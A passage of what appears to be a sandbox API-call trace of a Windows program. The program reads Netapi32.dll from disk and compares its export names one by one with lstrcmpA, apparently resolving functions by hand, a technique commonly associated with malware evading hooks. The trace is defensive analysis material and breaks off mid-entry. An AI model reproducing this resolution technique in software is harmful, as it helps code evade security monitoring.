lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0156.242] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0156.243] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.243] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.315] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0156.315] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0156.315] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0156.315] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0156.315] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0156.315] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0156.315] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0156.315] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0156.316] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0156.316] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0156.316] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0156.316] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0156.323] GetProcessHeap () returned 0x4d0000 [0156.323] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x397d010 | out: hHeap=0x4d0000) returned 1 [0156.324] GetProcessHeap () returned 0x4d0000 [0156.324] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e92b0 [0156.324] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0156.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0156.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0156.326] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0156.326] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0156.327] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0156.327] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0156.327] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0156.327] GetProcessHeap () returned 0x4d0000 [0156.327] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13b00) returned 0x2c45030 [0156.327] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.327] ReadFile (in: hFile=0x17c, lpBuffer=0x2c45030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c45030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0156.327] CloseHandle (hObject=0x17c) returned 1 [0156.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0156.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0156.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0156.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0156.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0156.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0156.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0156.332] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0156.332] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0156.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0156.334] lstrcmpA (lpString1="NetAccessEnum", 